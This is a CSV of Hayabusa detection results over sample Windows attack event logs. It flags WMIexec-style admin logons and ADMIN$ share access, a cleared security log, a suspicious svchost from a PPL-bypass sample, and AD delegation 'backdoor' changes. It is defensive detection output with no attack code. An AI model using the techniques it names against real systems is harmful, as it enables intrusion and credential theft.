2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47020  :  LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 34114  :  LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
